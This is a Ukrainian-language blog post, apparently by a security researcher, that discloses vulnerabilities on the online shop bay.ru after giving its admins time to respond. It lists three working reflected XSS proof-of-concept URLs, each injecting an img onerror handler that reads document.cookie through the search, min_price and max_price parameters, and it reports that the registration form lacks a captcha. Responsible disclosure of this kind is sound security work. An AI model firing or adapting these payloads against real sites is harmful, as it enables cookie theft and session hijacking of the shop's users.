Уразливості на www.bay.ru

15:21 17.01.2011

28.05.2010

У жовтні, 24.10.2009, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на сайті http://www.bay.ru (інтернет магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливість на vch.kiev.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

17.01.2011

XSS:

http://www.bay.ru/search?query=%3Cimg%20src=''%20onerror=%22javascript:alert(document.cookie)%22%3E
http://www.bay.ru/search?min_price=%22%3E%3Cimg%20src=%22%22%20onerror=%22javascript:alert(document.cookie)%22%3E
http://www.bay.ru/search?max_price=%22%3E%3Cimg%20src=%22%22%20onerror=%22javascript:alert(document.cookie)%22%3E

Insufficient Anti-automation:

В формі реєстрації (https://www.bay.ru/customer/signup, що зараз змінила адресу на https://www.bay.ru/account/register) немає захисту від автоматизованих запитів (капчі).

Якщо XSS уразливості вже виправлені, то IAA уразливість досі не виправлена.


Leave a Reply

You must be logged in to post a comment.